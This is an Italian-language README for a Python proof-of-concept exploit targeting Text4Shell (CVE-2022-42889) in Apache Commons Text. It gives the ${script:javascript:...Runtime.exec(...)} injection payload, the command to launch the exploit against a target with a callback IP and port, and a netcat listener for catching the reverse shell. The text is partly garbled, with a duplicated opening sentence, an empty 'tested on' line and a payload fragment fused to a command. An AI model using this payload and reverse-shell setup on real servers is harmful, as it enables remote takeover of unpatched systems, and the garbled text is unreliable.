
Un exploit proof-of-concept (PoC) personalizzato basato su Python che prende di mira Text4Shell (CVE-2022-42889), una grave vulnerabilità di esecuzione remota di codice in Apache Commons Text versioni < 1.10.
Un exploit proof-of-concept (PoC) personalizzato basato su Python che mira a Text4Shell (CVE-2022-42889), una vulnerabilità critica di esecuzione remota di codice in Apache Commons Text versioni < 1.10.
Questo exploit mira a applicazioni Java vulnerabili che utilizzano la classe StringSubstitutor con l'interpolazione abilitata, consentendo l'iniezione di espressioni ${script:...} per eseguire comandi di sistema arbitrari.
In questo PoC, lo sfruttamento è dimostrato tramite il parametro di query data; tuttavia, il nome del parametro vulnerabile può variare a seconda dell'implementazione. Gli utenti dovrebbero adattare di conseguenza il payload e il percorso della richiesta in base alla logica dell'applicazione target.
Disclaimer: Questo exploit è fornito esclusivamente a scopo educativo e per test di penetrazione autorizzati. Usalo in modo responsabile e a tuo rischio.
Questo è un exploit Python3 personalizzato per la vulnerabilità di Apache Commons Text nota come Text4Shell (CVE-2022-42889). Consente l'esecuzione remota di codice (RCE) tramite interpolatori non sicuri quando l'input utente viene valutato dinamicamente da StringSubstitutor.
Testato su:
${script:...}python3 text4shell.py <target_ip> <callback_ip> <callback_port>
python3 text4shell.py 127.0.0.1 192.168.1.2 4444
nc -nlvp 4444
Lo script inietta:
${script:javascript:java.lang.Runtime.getRuntime().exec(...)}
La reverse shell viene inviata tramite il parametro /data utilizzando una richiesta POST.